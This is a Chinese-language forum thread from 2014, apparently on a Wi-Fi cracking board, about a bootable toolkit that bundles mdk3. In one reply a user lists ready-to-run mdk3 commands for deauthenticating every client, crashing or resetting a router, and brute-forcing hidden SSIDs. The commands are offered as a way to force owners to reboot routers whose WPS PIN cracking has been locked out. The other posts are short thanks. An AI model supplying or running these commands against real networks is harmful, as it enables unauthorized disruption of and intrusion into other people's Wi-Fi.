nbyouth
发表于 2014-1-7 02:13
nbyouth 发表于 2014-1-5 14:25 static/image/common/back.gif
下载了.考完试试试.楼主有没有使用教程呀.没pj过.
楼主这个是集成mdk3的么??怎么好像输入命令以后没效果的??
stofi
发表于 2014-1-7 16:54
我猜是文件夹结构,要自己 下载cdl解压进去罢?我想要那个MDK 3
nbyouth
发表于 2014-1-7 21:16
nbyouth 发表于 2014-1-7 02:13 static/image/common/back.gif
楼主这个是集成mdk3的么??怎么好像输入命令以后没效果的??
哥.我mdk3了那个路由器半个小时都无效.依然坚挺.还有没有别的办法.用的是第一个命令
zjwz66666
发表于 2014-1-8 13:04
感谢分享!下载一个试一下!
coooda
发表于 2014-1-9 18:01
taihaoyongle
duxaaa
发表于 2014-1-9 19:52
nbyouth 发表于 2014-1-7 21:16 static/image/common/back.gif
哥.我mdk3了那个路由器半个小时都无效.依然坚挺.还有没有别的办法.用的是第一个命令
MDK3常用命令
让路由AP重启/重置: sudo mdk3 mon0 a -a 路由MAC地址
检查客户端是否隐藏并暴力PJ: sudo mdk3 mon0 p -e 路由MAC地址 -c 信道 -t 客户端地址 -f
提走连接路由所有客户端: sudo mdk3 mon0 d -n 路由MAC地址 -c 信道
杀死路由ap: sudo mdk3 mon0 m -t 路由MAC地址
启动最强力攻击: sudo mdk3 mon0 x -n 路由MAC地址 -t 客户端地址 -w 加密类型
经本人测试 防PIN死之所谓mdk3攻击模式纯属胡扯http://www.anywlan.com/thread-167726-1-1.html
我想说的是使用mdk3 时要根据情况选用不同的攻击模式,例如:
mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)
-a 模式是贴子上教我们使用的一种攻击模式,那你使用的次数多了,路由自然就免疫了,可能是原贴作者没有考虑到的问题,我在使用的过程中也有这样的问题。
经过我的实践发现,使用不同的攻击模式,两三分钟就可以关闭对话框然后重新扫描网络看pin死的路由是不是已经不在了。等待主人重启吧~~~
以下几种攻击模式,可以一个个试,看那个模式有用:
mdk3 mon0 a -p 40:16:9F:**:2C:B2
mdk3 mon0 a -d 40:16:9F:**:2C:B2
mdk3 mon0 a -f 40:16:9F:**:2C:B2
mdk3 mon0 a -g 40:16:9F:**:2C:B2
山楠
发表于 2014-1-9 20:11
来试试,如果成功就方便了
jacey361
发表于 2014-1-9 21:13
路过,习惯性的顶下了!
晨露流星
发表于 2014-1-10 11:28
顶而不懈,遇到好贴决不能放过
月缺hacker
发表于 2014-1-10 22:55
duxaaa 发表于 2013-10-4 10:38 static/image/common/back.gif
WIN7,WIN8 使用的是\BOOT\BCD 的启动方式,所以需要编辑BCD启动文件,这里会使用到“BOOTICE”软件来编 ...
谢谢!!!!!!
anywlan.520
发表于 2014-1-11 20:59
学习了, 谢谢
罗君
发表于 2014-1-11 21:11
支持一下,回家再下载